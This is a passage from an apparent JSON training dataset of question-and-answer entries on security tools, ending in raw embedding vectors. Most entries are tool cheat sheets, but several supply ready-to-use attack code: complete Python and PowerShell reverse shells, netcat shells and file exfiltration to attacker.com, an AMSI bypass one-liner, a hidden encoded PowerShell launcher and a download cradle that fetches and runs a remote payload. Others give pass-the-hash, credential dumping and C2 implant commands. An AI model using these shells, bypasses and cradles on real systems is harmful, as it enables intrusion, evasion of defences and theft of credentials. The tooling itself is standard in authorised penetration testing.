-w wordlist.txt (directory), ffuf -u http://target.com/page?param=FUZZ -w params.txt (parameter), ffuf -u http://target.com/FUZZ -w wordlist.txt -fc 403 (filter status). ffuf -u http://target.com/FUZZ -H 'Host: FUZZ.target.com' -w hosts.txt (vhost fuzz). Extensions: -x .php,.asp,.aspx,.jsp.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Hydra/Medusa for brute force attacks?","output":"Hydra - network login brute forcer. Commands: hydra -l admin -P pass.txt ssh://192.168.1.1 (SSH), hydra -L users.txt -P pass.txt rdp://target (RDP), hydra -l admin -P pass.txt smb://target (SMB), hydra -l admin -P pass.txt ftp://target (FTP), hydra -L emails.txt -P pass.txt smtp://target (SMTP), hydra -l admin -P pass.txt http-post-form '/login:user=^USER^&pass=^PASS^:F=incorrect' (web form). -t <threads> (parallel tasks), -vV (verbose). Output: -o results.txt. Medusa has similar syntax with -M <module> -h <host> -U users -P passwords.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Impacket tools for Windows protocol attacks?","output":"Impacket - Python Windows protocol tools. Key scripts: impacket-secretsdump DOMAIN/user:pass@target (DCSync/dump hashes). impacket-psexec DOMAIN/user:pass@target (remote execution via SMB). impacket-wmiexec DOMAIN/user:pass@target (WMI execution). impacket-smbexec DOMAIN/user:pass@target (SMB exec without touching disk). impacket-GetUserSPNs DOMAIN/user:pass -request (Kerberoast). impacket-GetNPUsers DOMAIN/ -request -no-pass (AS-REP roast). impacket-ticketer -nthash HASH -domain DOMAIN -user admin (golden ticket). impacket-rpcdump target (RPC endpoint mapper).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Responder for LLMNR/NBT-NS poisoning?","output":"Responder - name resolution poisoning. Usage: sudo responder -I eth0 (poison all protocols on interface). sudo responder -I eth0 -w (enable WPAD). sudo responder -I eth0 -r (enable MySQL auth capture). sudo responder -I eth0 -v (verbose). Captured: SMBv2 NTLMv2 hashes, HTTP basic auth, Kerberos tickets in logs/SMB-*.txt. Analysis with: john or hashcat -m 5600 captured_hash.txt. Cleanup after test. Off: -A (analyze mode, no poisoning). Combine with ntlmrelayx for relay attacks.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Ligolo-ng for network tunneling?","output":"Ligolo-ng - lightweight tunneling/pivoting. Setup: 1) Start proxy on attacker: ligolo-proxy -selfcert -laddr 0.0.0.0:443. 2) Deploy agent on target: ligolo-agent -connect attacker.com:443 -ignore-cert. 3) In proxy: session (list), session <id> (select), ifconfig (see routes), listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:8080 (forward port). Routing: ip link set ligolo up, ip route add 10.10.0.0/24 dev ligolo (add routes). Windows agent: ligolo-windows-amd64.exe -connect attacker.com:443 -ignore-cert.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Chisel for fast TCP/UDP tunneling?","output":"Chisel - fast TCP/UDP tunnel over HTTP. Server (attacker): chisel server -p 8000 --reverse. Client (target): chisel client attacker.com:8000 R:8001:localhost:80 (forward port 8001 to target's port 80). chisel client attacker.com:8000 R:socks (SOCKS5 proxy on server). chisel client attacker.com:8000 R:0.0.0.0:8443:10.10.0.1:443 (pivot to internal host). One binary for all platforms. Use --fingerprint for mutual auth. Add --keepalive to maintain connection. Windows: chisel.exe client attacker.com:8000 R:socks.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Netcat for networking and reverse shells?","output":"Netcat/ncat - networking utility. Reverse shell listener: nc -lvnp 4444 (listen), nc -e /bin/sh attacker.com 4444 (Linux send), ncat.exe -e cmd.exe attacker.com 4444 (Windows). Port scan: nc -zv target 1-1000 (TCP scan), nc -zvu target 53 (UDP). File transfer: nc -lvp 4444 > file (receive), nc attacker.com 4444 < file (send). Banner grab: echo 'GET / HTTP/1.0\r\n' | nc target.com 80. Chat: nc -lvp 4444 (host), nc host.com 4444 (connect). Bind shell: nc -lvnp 4444 -e /bin/sh.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use PowerShell for cybersecurity tasks?","output":"PowerShell - Windows scripting for security. Key cmdlets: Get-Process (list processes), Get-Service (services), Get-WmiObject Win32_ComputerSystem (system info), Get-WmiObject Win32_UserAccount (user accounts). Remote: Invoke-Command -ComputerName target -ScriptBlock {cmd} (remote exec), Enter-PSSession target (interactive). AMSI bypass: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true). Execution: powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64>. Download cradle: IEX (New-Object Net.WebClient).DownloadString('http://host/payload.ps1').","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Python for cybersecurity scripting?","output":"Python - security scripting. Key libraries: requests (HTTP), socket (networking), scapy (packet manipulation), paramiko (SSH), impacket (Windows protocols), cryptography, pycryptodome (crypto), pywinrm (WinRM), dnspython (DNS). Common patterns: import requests; r = requests.get('http://target.com', headers={'User-Agent': 'Mozilla/5.0'}). Socket: s.connect(('host', port)); s.send(data); s.recv(1024). Subprocess: import subprocess; result = subprocess.run(['nmap','-sV','target'], capture_output=True, text=True). Threading for parallel tasks. Argument parsing with argparse. JSON handling with json module.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use curl for HTTP requests in cybersecurity?","output":"curl - HTTP client for testing. Commands: curl -v http://target.com (verbose). curl -k https://target.com (ignore TLS errors). curl -X POST -d 'data=value' http://target.com (POST). curl -b 'session=abc' -c cookies.txt http://target.com (cookies). curl -H 'Authorization: Bearer TOKEN' http://target.com/api (auth header). curl -A 'Mozilla/5.0' -e http://referrer.com http://target.com (spoof user-agent + referer). curl -o output.html -s -S http://target.com (save output, silent). curl --proxy http://proxy:8080 http://target.com (via proxy). curl --path-as-is -u admin:admin http://target.com (basic auth).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to perform pass-the-hash attacks?","output":"Pass-the-Hash - authenticate with NTLM hash. Tools: impacket-psexec DOMAIN/admin@target -hashes LMHASH:NTHASH (psexec). impacket-wmiexec DOMAIN/admin@target -hashes LMHASH:NTHASH (WMI). impacket-smbexec same syntax (SMB). Mimikatz: sekurlsa::pth /user:admin /domain:DOMAIN /ntlm:HASH (creates process with hash). CrackMapExec: crackmapexec smb target -u admin -H NTHASH -x 'whoami' (remote exec). Evil-WinRM: evil-winrm -i target -u admin -H NTHASH (WinRM shell). Native: winexe -U DOMAIN/admin%HASH //target cmd.exe.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use CrackMapExec (CME) for network assessment?","output":"CrackMapExec (CME) - Windows network assessment. Commands: crackmapexec smb target -u users.txt -p pass.txt (password spray). crackmapexec smb target -u admin -H NTHASH --local-auth (pass-the-hash). crackmapexec smb target -u admin -H NTHASH -x whoami (remote exec). crackmapexec smb target --sessions (logged-in users). crackmapexec smb target --shares (list shares). crackmapexec smb target --sam (dump SAM). crackmapexec smb target --lsa (dump LSA). crackmapexec smb target --dpapi (DPAPI secrets). crackmapexec smb target -M mimikatz -o COMMAND='sekurlsa::logonpasswords' (run module). Modules in ~/.cme/modules/. Logs in ~/.cme/logs/.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to perform Kerberoasting attacks?","output":"Kerberoasting - get TGS tickets for service accounts. impacket-GetUserSPNs DOMAIN/user:pass -outputfile hashes.txt (request+save). impacket-GetUserSPNs DOMAIN/user:pass -request (or just request). Windows (PowerShell): Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/target.domain.com' (request SPN ticket). klist (view tickets). mimikatz: kerberos::ask /target:HTTP/target.domain.com (request ticket). Crack with: hashcat -m 13100 hashes.txt wordlist.txt (Kerberos TGS-REP). john hashes.txt --format=krb5tgs. Mitigation: managed service accounts (gMSA), strong (>25 char) random passwords for service accounts.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to perform AS-REP roasting attacks?","output":"AS-REP roasting - target accounts with 'Do not require Kerberos preauth' flag. impacket-GetNPUsers DOMAIN/ -usersfile users.txt -request -dc-ip DC_IP (request AS-REP for list). impacket-GetNPUsers DOMAIN/user:pass -request (if you have creds for one user, find others). Windows (PowerShell with Rubeus): Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt. Crack with: hashcat -m 18200 hashes.txt wordlist.txt (AS-REP hashcat mode). john hashes.txt --format=krb5asrep. Enumerate: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth (PowerShell AD module).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Evil-WinRM for Windows remote management?","output":"Evil-WinRM - Windows remote shell via WinRM. Commands: evil-winrm -i target -u admin -p password (password auth). evil-winrm -i target -u admin -H NTHASH (pass-the-hash). evil-winrm -i target -u admin -p password -s scripts/ (load scripts folder). evil-winrm -i target -u admin -p password -e binaries/ (upload binaries). Features: Bypass 4MSI (automatically AMSI bypass). `menu` shows options (DLL load, Invoke-Binary, upload/download). PowerShell scripts loadable with -s flag. Upload files: upload local.txt C:\remote.txt. Download: download C:\remote.txt local.txt.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use ysoserial for Java deserialization attacks?","output":"ysoserial - Java deserialization payload generator. Commands: java -jar ysoserial.jar CommonsCollections1 'cmd /c whoami' (generate payload). java -jar ysoserial.jar JRMPClient 'attacker:1099' (RMI client). java -jar ysoserial.jar URLDNS 'http://burpcollab.net' (verify deserialization). Common gadgets: CommonsCollections1-7, CommonsBeanutils1, Jdk7u21, JRMPClient/Server, Groovy1, Spring1, Hibernate1-2. Use ysoserial.net for .NET applications. Detection: SerialKiller, Contrast, gadget-probe. Mitigation: upgrade libraries, use deserialization whitelist, non-default ObjectInputStream.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Empire/Starkiller for post-exploitation?","output":"Empire + Starkiller - post-exploitation C2. Empire server: sudo powershell-empire server (start server). Client: sudo powershell-empire client (CLI access). Starkiller web UI: connect to https://localhost:1337 (graphical interface). Key commands: listeners (list), uselistener http (HTTP listener), set Host http://attacker.com, set Port 8080, execute. usestager windows/launcher_bat (generate stager), set Listener http, execute. agents (list active), interact AGENT_ID (enter agent), shell whoami (run OS command). Modules: usemodule credentials/mimikatz/logonpasswords, usemodule situational_awareness/host/computerdetails.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Sliver C2 for command and control?","output":"Sliver C2 - implant framework. Server: sliver-server (start). Client: sliver-client (connect). Profiles: new-profile --mtls attacker.com --http attacker.com --name win64 --arch amd64 --format exe --os windows. Generate: generate --profile win64 --save /tmp/implant.exe (generate implant). generate --http http://attacker.com:80 --save beacon.exe (single-protocol). Listeners: mtls --lhost 0.0.0.0 --lport 443, http --lhost 0.0.0.0 --lport 80. When implant calls back: use IMPLANT_ID, info (show details). Commands: shell (interactive), ps, ls, cd, upload/download, screenshot, sideload (execute DLL), execute-shellcode (run shellcode), socks5 (SOCKS proxy), pivot listener (pivot listener).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Mythic C2 for command and control?","output":"Mythic C2 - multi-agent C2 framework. Deploy: docker-compose up (start Mythic services). Web UI at https://localhost:7443. Agents: apollo (Windows .NET), poseidon (macOS), thanatos (Python cross-platform), atlas (Rust cross-platform). Creating callback: generate payload in UI. Commands per agent (e.g., poseidon): shell (OS command), download/upload, ls, cp, mv, ps, kill, socks (SOCKS proxy), portscan (TCP scanner), screencapture, keylog (keylogging). Plugin marketplace for community agents. Task chaining, browser script automation for multi-step tasks. HTTP/S, DNS, SMB, and TCP C2 profiles.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Havoc C2 for command and control?","output":"Havoc C2 - modern C2 with Demon agent. Server: sudo ./havoc server --profile ./profiles/havoc.yaotl (start server). Client: ./havoc client (GUI client). Payload config: create Listener (HTTP/S, SMB, Pivot, External), configure Host, Port, User-Agent, Headers. Generate payload: choose architecture (x64/x86), format (EXE/DLL/Shellcode), techniques. Features: sleep obfuscation (Ekko, Foliage), indirect syscalls (Hell's Gate, Halo's Gate), ETW patching, AMSI bypass, NTDLL unhooking. Callbacks: command output, file browser, screenshots, token manipulation, SOCKS proxy. Extensibility: Python plugins, custom agent support.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to build a reverse shell in Python?","output":"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn('/bin/sh') [Linux reverse shell]. For Windows: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);while True: buf=s.recv(1024).decode(); if buf.lower()=='exit\\n': break; o=subprocess.check_output(buf,shell=True,stderr=subprocess.STDOUT); s.send(o). Encoded: python3 -c 'EXEC'.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to build a reverse shell in PowerShell?","output":"PowerShell reverse shell: $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close(). One-liner: powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <base64-encoded-command>. Use Invoke-PowerShellTcp.ps1 from Nishang for advanced features (persistence, download, upload).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to perform network enumeration with Windows CMD?","output":"Windows CMD enumeration commands: systeminfo (OS/patches), whoami /all (user + privileges), net user (list users), net user USERNAME (user details), net localgroup (groups), net localgroup Administrators (admin group), net group /domain (domain groups), net group 'Domain Admins' /domain (domain admins), net share (shares), net use (mounted drives), ipconfig /all (network config), route print (routing table), arp -a (ARP cache), nslookup TARGET (DNS), netstat -ano (active connections + PIDs), tasklist /v (processes with owners), wmic product list brief (installed software), reg query (registry query), dir /s *.config (find config files).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Bash for Linux cybersecurity scripting?","output":"Bash - Linux security scripting. Enumeration: uname -a (kernel), cat /etc/os-release (distro), id (current user), sudo -l (sudo privileges), cat /etc/passwd (users), cat /etc/shadow (hashes - need root), ps aux (processes), ss -tlnp (listening ports), netstat -tulpn (listening), find / -perm -4000 -type f (SUID binaries), find / -writable -type f 2>/dev/null (writable files), crontab -l (cron jobs), ls -la /etc/cron* (system cron), env (environment variables), cat ~/.bash_history (command history), mount (mounted filesystems), df -h (disk usage), ldd /bin/app (shared libraries). One-liners: for ip in $(seq 1 254); do ping -c 1 10.0.0.$ip | grep 'bytes from' & done (ping sweep).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use searchsploit/Exploit-DB for exploit research?","output":"Searchsploit - Exploit-DB search tool. Commands: searchsploit <term> (search exploit database). searchsploit -t <title> (search title only). searchsploit apache 2.4.49 (specific version). searchsploit -m <EDB-ID> (mirror exploit to cwd). searchsploit -x <EDB-ID> (view exploit contents). searchsploit -o (online mode for updates). searchsploit -u (update database). searchsploit --cve CVE-2021-41773 (search by CVE). Categories: remote, local, webapps, dos, shellcode. Export: searchsploit -t <term> -j (JSON output for scripting). Path: /usr/share/exploitdb/exploits/. Update with: sudo searchsploit -u.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Ghidra for reverse engineering?","output":"Ghidra - reverse engineering framework. Installation: requires JDK 17+, download from ghidra-sre.org. Create project: File > New Project > Non-Shared. Import binary: File > Import File (select PE/ELF/Mach-O). Analysis: auto-analyze (x86, ARM, MIPS). Key features: Decompiler (Window > Decompiler), Listing (disassembly view), Symbol Tree (functions, labels), Program Trees (sections), Data Type Manager (structs/reconstruction). Navigation: function graph (right-click > Graph), search > Memory / Program Text, call tree. Scripting: Python 3 (Jython) and Java scripts via Script Manager. Scripts: SymbolicPropagation, StackAnalyzer, PDB. Use Ghidra plugins + extensions for enhanced analysis.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use x64dbg for Windows debugging?","output":"x64dbg - Windows debugger. Open: x64dbg.exe (x64), x32dbg.exe (x86). Key commands: F2 (breakpoint), F7 (step into), F8 (step over), F9 (run), Ctrl+F2 (restart), Ctrl+G (go to address). Breakpoints: Set on API calls (bp CreateFileW), conditional (right-click > Conditional Breakpoint). Memory map: View > Memory Map. Symbols: View > Symbols. Patches: Right-click > Assemble (modify instructions). Plugins: ScyllaHide (anti-debugging bypass), xAnalyzer (analysis), OllyDump (dump process), TitanHide (kernel-mode hiding). Scripting: x64dbgpy (Python plugin), x64_dotnet (managed code debugging). Export memory regions: right-click memory map > Dump (dump to file).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use dnSpy for .NET decompilation?","output":"dnSpy - .NET decompiler/debugger. Open file: File > Open (drag-drop .exe/.dll/.winmd). Features: decompile to C# (full source reconstruction), edit assembly (right-click method > Edit Method, then compile). Debug: F5 (start debugging), set breakpoints (F9), step through (F10/F11). Search: Ctrl+Shift+K (search by string/class/method across assemblies). Analyzer: select method > Analyze (shows callers/callees/references). Export: File > Save Module (patched assembly to disk). BAML decompiler (WPF XAML). Hex view for raw IL. Use de4dot before dnSpy on obfuscated assemblies to deobfuscate. Supports .NET Core, .NET 5+ assemblies.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Process Monitor (ProcMon) for Windows forensics?","output":"Process Monitor (ProcMon) - Windows activity monitor. Default filters: Include operations (RegSetValue, CreateFile, WriteFile, Process Create). Filter by: Process Name (include/exclude), Operation (RegOpenKey, CreateFile), Path (specific file/reg path), Result (SUCCESS, ACCESS DENIED). Key columns: Time, Process Name, PID, Operation, Path, Result, Detail. Focus on: CreateFile (file writes), WriteFile (data exfiltration), RegSetValue (persistence), Process Create (process injection), TCP/UDP Send/Recv (network). Boot logging: Enable Boot Logging in Options > Enable Boot Logging. Use Procmon.exe /BackingFile log.pml /Quiet /AcceptEula for command-line capture. Process Monitor Filter DLL for advanced regex filtering.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Sysinternals tools for system analysis?","output":"Sysinternals - Windows system tools. Key tools: Process Explorer (procexp.exe) - detailed process tree, DLL listing, handle view. Process Monitor (procmon.exe) - real-time file/registry/process monitoring. PsExec (psexec.exe) - remote execution (psexec \\\\target -u user -p pass cmd). AccessChk (accesschk.exe) - check user permissions (accesschk64 -uwdqs Users c:\\windows). Autoruns (autoruns64.exe) - all startup locations, services, drivers, scheduled tasks. Strings (strings64.exe) - extract strings from binaries. TCPView (tcpview64.exe) - TCP/UDP endpoint monitoring. Handle (handle64.exe) - open file handles by process. Sigcheck (sigcheck64.exe) - file version/signing info. All available from Microsoft Sysinternals site.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use YARA for malware detection?","output":"YARA - pattern matching for malware. Rule syntax: rule RuleName { meta: description = 'description' strings: $text = 'malicious string' ascii wide nocase $hex = { 90 90 90 ?? E9 } condition: $text or $hex }. Scan: yara rule.yar target.exe (scan single file). yara -r rule.yar C:\\Windows\\System32 (recursive scan directory). yara -s rule.yar file.exe (print matching strings). yara -m rule.yar file.exe (print metadata). Modules: pe (PE files), elf (ELF), math (math functions), magic (file magic), cuckoo (Cuckoo sandbox). Includes: include 'other.yar'. Performance: compile rules with yarac for faster scans. Use with jYARA in Python: pip install yara-python, import yara, rules = yara.compile('rule.yar'), matches = rules.match('file.exe').","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Volatility 3 for memory forensics?","output":"Volatility 3 - memory forensics. Install: pip install volatility3. Memory dump acquisition: winpmem (Windows), dumpit (Magnet), liME (Linux). Analysis: vol -f memory.dmp windows.info (OS/version info). vol -f memory.dmp windows.pslist (process list). vol -f memory.dmp windows.psscan (process scan with hidden). vol -f memory.dmp windows.pstree (process tree). vol -f memory.dmp windows.netscan (network connections). vol -f memory.dmp windows.cmdline (command lines). vol -f memory.dmp windows.filescan (open file handles). vol -f memory.dmp windows.dumpfiles --pid 1234 (dump process memory). vol -f memory.dmp windows.malfind (injections/PE). vol -f memory.dmp windows.registry.hivelist (registry hives). vol -f memory.dmp windows.hashdump (SAM hashes). Output: -o output_dir.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use JQ for JSON processing in security scripts?","output":"jq - JSON command-line processor. Commands: cat data.json | jq '.' (pretty-print). jq '.results' file.json (extract key). jq '.[] | select(.severity == \"high\")' vulns.json (filter). jq '.[].ip' hosts.json (extract all IPs). jq -r '.[].name' names.json (raw output, no quotes). jq 'group_by(.port) | map({port: .[0].port, count: length})' scans.json (aggregate). jq -c '.[]' file.json (compact output). jq -s 'add' *.json (merge multiple JSON files). jq '[.[] | {ip: .ip, port: .port}]' file.json (reshape objects). jq 'unique_by(.ip)' file.json (deduplicate). jq --arg ip '10.0.0.1' '.[] | select(.ip == $ip)' file.json (variable binding). jq -f filter.jq data.json (use filter file).","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Nmap NSE scripts for vulnerability scanning?","output":"NSE - Nmap Scripting Engine. Command: nmap -sV --script=<script> <target>. nmap --script=vuln <target> (all vulnerability checks). nmap --script=http-enum <target> (web directory enum). nmap --script=smb-enum-shares <target> (SMB shares). nmap --script=rdp-sec-check <target> (RDP security). nmap --script=ssl-enum-ciphers -p 443 <target> (TLS cipher audit). nmap --script=dns-zone-transfer <target> (DNS zone transfer). nmap --script=ssh2-enum-algos <target> (SSH algorithms). nmap --script=mysql-empty-password <target> (MySQL default creds). Custom NSE: /usr/share/nmap/scripts/ (script location). Write NSE: in Lua with description, author, categories, portrule, action function. Update NSE DB: nmap --script-updatedb.","created_at":1779361199,"tags":[]},{"source":"cyber-tools","instruction":"How to use Nuclei for automated vulnerability scanning?","output":"Nuclei - template-based vulnerability scanner. Commands: nuclei -u http://target.com (scan single target). nuclei -l targets.txt (scan list). nuclei -t cves/ -u http://target.com (scan CVE templates only). nuclei -t ~/nuclei-templates/ -u http://target.com -severity critical,high (by severity). nuclei -u http://target.com -o results.json -json (JSON output). nuclei -u http://target.com -stats (real-time stats). nuclei -u http://target.com -rate-limit 100 (requests/second). Custom templates: id: custom-check, info: { name: '...', severity: medium }, requests: [{ method: GET, path: ['/admin'], matchers: [{ type: word, words: ['Dashboard', 'Login'] }] }]. Templates dir: ~/nuclei-templates/. Update: nuclei -update-templates.","created_at":1779361199,"tags":[]}],"embeddings":[[-0.0013682605,-0.020916546,-0.019926094,-0.028988753,0.022245437,-0.0021162452,-0.0017541666,0.010098002,0.0048554945,-0.009244168,-0.0015690048,0.009234931,-0.0015068041,0.007905997,-0.005129384,0.018974852,0.00015718413,0.0050805965,-0.015467711,-0.005369095,0.013681565,0.0025532825,-0.002640255,-0.0179506,-0.0019254358,-0.012616661,0.017676387,-0.016577786,0.018539421,-0.0019297588,0.009738309,-0.0013344752,0.008845298,0.0075536664,0.015467086,-0.0111597255,0.0006120878,-0.00418756,-0.00041623806,-0.011011725,-0.002685519,0.010927917,-0.009341757,0.016701445,0.003995121,-0.023404038,0.006827966,0.01554407,-0.012545449,0.0060508754,-0.0068360316,-0.010576153,0.006529713,0.02471176,-0.009302876,0.012371279,0.00007260994,-0.03433898,0.0057174047,-0.034718983,0.0019781839,-0.016038602,-0.01170659,-0.030398242,0.003161674,-0.008604582,0.0065611796,-0.02100991,0.00026389942,-0.014356249,0.011252951,-0.0014588103,0.013690071,-0.0222055,-0.014262099,0.021988742,0.010708924,-0.00983115,-0.0038090807,0.016973553,-0.030807195,-0.006902658,-0.0077096797,-0.01705011,0.0077964254,-0.007549986,-0.03134998,-0.011309503,-0.0064664115,-0.019235915,-0.003832669,0.018579682,0.010303072,0.011687452,-0.025428979,0.021558627,0.018845307,0.025997715,-0.01178074,0.02448811,-0.012160922,0.008254255,-0.040416025,0.013941301,0.025718024,-0.03805965,-0.0049515273,-0.0076406114,-0.0016357257,-0.030890621,0.018088518,-0.0059993113,0.0052433875,0.010488008,0.0056394315,-0.016006744,-0.02215468,0.004826825,-0.007911428,-0.0036099716,-0.007950182,-0.006042879,0.0010520023,-0.013096712,-0.02507497,0.009314106,-0.015907332,0.013365093,0.020041294,-0.0122833755,-0.00043762926,0.010130595,0.011213986,-0.01203637,0.0049538207,-0.0119599635,0.00085977034,-0.006437509,0.0066546244,-0.013619474,0.016753906,-0.02167327,-0.0008801843,-0.0005350791,0.009588845,0.028602527,0.002799651,0.019335888,0.012215746,-0.007054266,0.019300787,-0.015541167,0.0068589235,-0.031129906,-0.011237127,0.0071439096,-0.01671,-0.019590652,-0.009819642,0.003852632,-0.022958677,-0.001627921,0.022615286,-0.012761083,-0.00949229,-0.002901221,0.00024054683,-0.016841521,-0.0004464533,-0.029778272,0.024483578,0.024395488,0.01133417,-0.019155195,-0.0035804987,-0.0029284433,-0.0083995545,-0.031963054,0.0048374604,0.003072827,0.011129832,-0.008192808,0.008182115,0.010880603,-0.015558047,0.025182202,0.007402694,-0.013260345,-0.03008336,0.0027810403,0.021573137,-0.014635261,-0.02608152,-0.017729577,-0.006687604,-0.030375266,-0.012359208,0.08291832,0.014693942,-0.0010819833,-0.0027060758,0.007526422,-0.002030744,-0.030119373,-0.027709391,-0.007592109,-0.028757427,0.014255011,-0.0043485574,-0.020394877,0.010047375,-0.0010505553,0.018532002,0.022026796,-0.009818272,-0.032996543,0.014469536,0.012242637,0.004640204,0.016675932,-0.019325137,0.012928383,0.00011919735,-0.022808503,0.0073946565,-0.027392816,0.0068981377,-0.01659784,0.001684576,-0.017546473,0.021626424,0.016609369,-0.023501886,-0.021273065,0.019748222,-0.019127188,-0.0016510928,-0.0058321822,-0.007329448,-0.010432551,-0.009032332,0.020832691,0.019676097,0.024514368,-0.002230559,0.002531691,-0.004163142,0.0005799339,-0.024393015,0.0108155,0.0072359703,-0.016053226,0.020428482,0.018042572,0.0015803202,-0.021762425,-0.01147037,-0.015852679,0.00012766007,0.0006200589,0.01524598,0.0126198,-0.015740816,0.007084138,0.013595796,-0.011657881,0.00681034,-0.036351874,0.009671157,0.009881869,-0.0026359868,-0.018328555,-0.0077314023,-0.025235938,0.015887832,0.0023707256,0.010035756,0.00029911587,-0.010530106,-0.0058206297,0.0024991576,-0.0073007783,-0.012126355,-0.019149097,0.0045593884,0.0067248875,-0.012412979,0.009857504,0.03699893,-0.008304154,0.032138642,0.007349432,0.034966353,0.014812594,-0.017489977,-0.02343539,-0.022382975,0.038378716,0.01271335,-0.028966611,-0.00095360324,-0.00003652657,0.017252514,-0.008837664,-0.0074574854,-0.007269101,-0.011617067,0.008821353,-0.0035476354,0.014674877,-0.040209047,-0.024068132,-0.013744759,-0.027941365,-0.009824969,0.013764114,0.0032494657,0.0015459649,-0.0036216949,0.020869173,0.0060348134,-0.015680043,0.005429036,-0.040593296,-0.0092238365,0.017993951,-0.0008176707,-0.0042886063,0.024100786,0.018347898,0.0062032966,0.026129827,-0.009759038,0.016261421,0.010510546,0.014998799,-0.0071059437,0.018307576,0.01175759,0.002251281,-0.0061432384,0.01808991,-0.0127175525,0.011973004,-0.013754106,0.0010123331,-0.00095691014,0.01242616,0.018420221,-0.005827292,0.021642499,-0.005360766,0.0030261837,0.018725093,-0.007203227,-0.012112652,-0.012108058,-0.016382003,-0.03257639,-0.019787764,0.008201625,0.0043824418,-0.009164816,0.0015843215,0.06364949,-0.0022159764,0.0016169694,-0.005230907,-0.010348444,-0.0042314674,0.017225303,0.0009906883,-0.00157782,-0.0108816745,-0.04030851,-0.0017279681,0.010954479,0.03170067,-0.0019312683,0.008560284,-0.018995576,-0.011030787,-0.013212508,0.005091816,0.04167585,-0.024614872,0.015977625,0.027720196,0.027280306,0.020396078,-0.004478585,0.00049995695,-0.012316746,-0.010336551,-0.010586277,-0.0038172954,0.0038566783,-0.0024897626,-0.033859964,0.020243134,0.029790215,-0.012700897,-0.02309395,-0.018873079,0.0077824183,0.0061236415,-0.013076151,-0.018375764,0.0073793833,0.05562953,0.0062681986,-0.004413034,-0.024445651,0.02216375,-0.0015143058,0.030843005,-0.0204553,0.013737683,0.032258883,0.022943707,0.007785034,-0.024353085,0.055869155,0.018363185,0.029665608,0.036393367,-0.008975132,-0.013101707,0.03411791,0.039469656,-0.00042343105,0.012247223,-0.015654232,-0.009927203,-0.008063553,0.0050283293,0.018157205,0.021995373,-0.006548017,0.0070760055,-0.003819239,0.019492032,0.0029699008,0.028006047,0.0023594105,0.008750822,0.0052593183,-0.0013191607,-0.017989744,-0.0025120438,-0.016597096,-0.0054036817,0.026754329,0.0027019798,-0.029998787,0.02615205,0.020569568,-0.021093084,0.03507071,0.01212511,0.0033147924,0.014428005,0.0019218287,-0.019670632,0.002125352,-0.0046308716,0.00496378,-0.007358892,-0.00733779,-0.02383231,0.0069277915,0.003936221,0.0030233606,0.010572123,-0.02461415,0.0138357775,-0.018113222,-0.0044968966,-0.02201572,-0.01903117,-0.009429799,0.0002220401,-0.018338878,-0.0017253903,0.022389865,0.0058011906,0.005384747,0.013141642,0.0042592683,0.0067677004,0.0045011523,-0.014712775,-0.0021978882,0.023958663,0.007933128,0.0124292355,0.010145618,-0.046407837,